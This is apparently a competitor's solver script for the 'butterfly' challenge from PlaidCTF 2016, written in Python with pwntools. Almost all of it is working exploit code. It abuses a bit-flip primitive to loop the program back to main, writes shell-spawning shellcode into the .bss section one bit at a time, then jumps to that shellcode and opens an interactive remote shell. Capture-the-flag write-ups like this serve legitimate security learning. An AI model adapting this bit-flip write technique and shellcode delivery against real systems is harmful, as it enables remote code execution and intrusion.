My solution to the butterfly challenge from PlaidCTF 2016
# Solver script for the "butterfly" challenge; depends on pwntools (pwn).
from pwn import *
context(arch="amd64")
# The target binary.  All addresses below come from its symbol table
# (main, .bss), so they assume the binary is mapped at its link address.
e = ELF("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
r = remote("butterfly.pwning.xxx", 9999)
#r = process("./butterfly_33e86bcc2f0a21d57970dc6907867bed")  # local run against the same binary
# Hard-coded address inside the target binary; what it points at is not
# recoverable from this file alone — confirm against the binary.
addr = 0x400860+3
# Same encoding as www_b below: (byte address << 3) + bit index, here bit 6.
num = (addr << 3) + 6
# Request format: the decimal number left-justified to 40 characters, then the
# packed address of main.  Unlike www_b, no prompt is read before this send.
r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))
def www_b(where, what):
    """Send one request per set bit of the byte `what` for address `where`.

    Each request waits for the service prompt, then sends
    (where << 3) + bit_index left-justified to 40 characters followed by
    the packed address of main.  Only bits 0-7 of `what` are considered.
    Uses the module-level `r` (connection) and `e` (ELF).
    """
    set_bits = [bit for bit in range(8) if what & (1 << bit)]
    for bit in set_bits:
        payload = str((where << 3) + bit).ljust(40) + p64(e.symbols["main"])
        r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
        r.sendline(payload)
def www(where, what):
    """Write the byte string `what` at consecutive addresses from `where`.

    Each character is handed to www_b with its offset; `u8` (pwntools)
    converts the one-character string to its integer value.
    """
    offset = 0
    for ch in what:
        www_b(where + offset, u8(ch))
        offset += 1
# Write the payload byte by byte into .bss, 100 bytes past its start.
www(e.bss(100), asm(shellcraft.sh()))
# Final request: address e.bss(99) with bit index 0, followed by the packed
# address of e.bss(100) where every earlier request carried main.
r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
r.sendline(str(e.bss(99) << 3).ljust(40)+p64(e.bss(100))) # return to our shellcode
# Drop any pending output before handing the connection to the user.
r.clean()
r.interactive()